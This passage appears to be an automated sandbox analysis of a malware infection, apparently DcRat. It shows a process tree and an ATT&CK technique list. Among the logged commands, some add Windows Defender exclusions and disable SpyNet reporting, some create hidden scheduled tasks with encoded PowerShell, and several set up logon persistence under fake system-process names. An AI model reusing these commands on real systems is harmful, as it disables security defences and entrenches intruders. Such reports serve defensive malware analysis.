C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 596
6⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1404

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_2.exe
arnatic_2.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_1.exe
arnatic_1.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 1032
5⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2876 -ip 2876
1⤵
PID:2472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1668 -ip 1668
1⤵
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4248 -ip 4248
1⤵
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 756 -ip 756
1⤵
PID:844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2284 -ip 2284
1⤵
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1692 -ip 1692
1⤵
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1404 -ip 1404
1⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\7zS2B00.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
PID:552

C:\Users\Admin\AppData\Local\Temp\7zS45AC.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:4988

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
- Executes dropped EXE
PID:4248

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
- Blocklisted process makes network request
PID:4592

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:5076

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:3552

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:400

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:1360

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1468

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpmbIxPMf" /SC once /ST 00:09:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- DcRat
- Creates scheduled task(s)
PID:3612

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpmbIxPMf"
3⤵
PID:4804

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpmbIxPMf"
3⤵
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 00:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\cSWCkXC.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- DcRat
- Creates scheduled task(s)
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1404 -ip 1404
1⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
cmd
1⤵
PID:2140

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
2⤵
- Enumerates processes with tasklist
PID:3764

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
2⤵
PID:1152

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
2⤵
- Enumerates processes with tasklist
PID:3612

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
2⤵
PID:4780

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
2⤵
PID:2376

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
2⤵
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1404 -ip 1404
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4248 -ip 4248
1⤵
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 756 -ip 756
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2284 -ip 2284
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1692 -ip 1692
1⤵
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\Windows.Networking.Vpn\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "U6CzE6TUlznQXVAFWfCiuZnR" /sc ONLOGON /tr "'C:\Windows\it-IT\U6CzE6TUlznQXVAFWfCiuZnR.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "U6CzE6TUlznQXVAFWfCiuZnR" /sc ONLOGON /tr "'C:\Documents and Settings\U6CzE6TUlznQXVAFWfCiuZnR.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\System32\mfc100\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "zg71lq8733KC65bX624m8tqW" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\zg71lq8733KC65bX624m8tqW.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1404 -ip 1404
1⤵
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1404 -ip 1404
1⤵
PID:3224

C:\Users\Admin\AppData\Roaming\rweteii
C:\Users\Admin\AppData\Roaming\rweteii
1⤵
- Executes dropped EXE
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Blocklisted process makes network request
PID:2380

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1404 -ip 1404
1⤵
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1404 -ip 1404
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1404 -ip 1404
1⤵
PID:1032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1404 -ip 1404
1⤵
PID:3520

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1428

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\cSWCkXC.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\cSWCkXC.exe j6 /site_id 525403 /S
1⤵
PID:2428

C:\Users\Admin\AppData\Local\Temp\984C.exe
C:\Users\Admin\AppData\Local\Temp\984C.exe
1⤵
PID:4372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery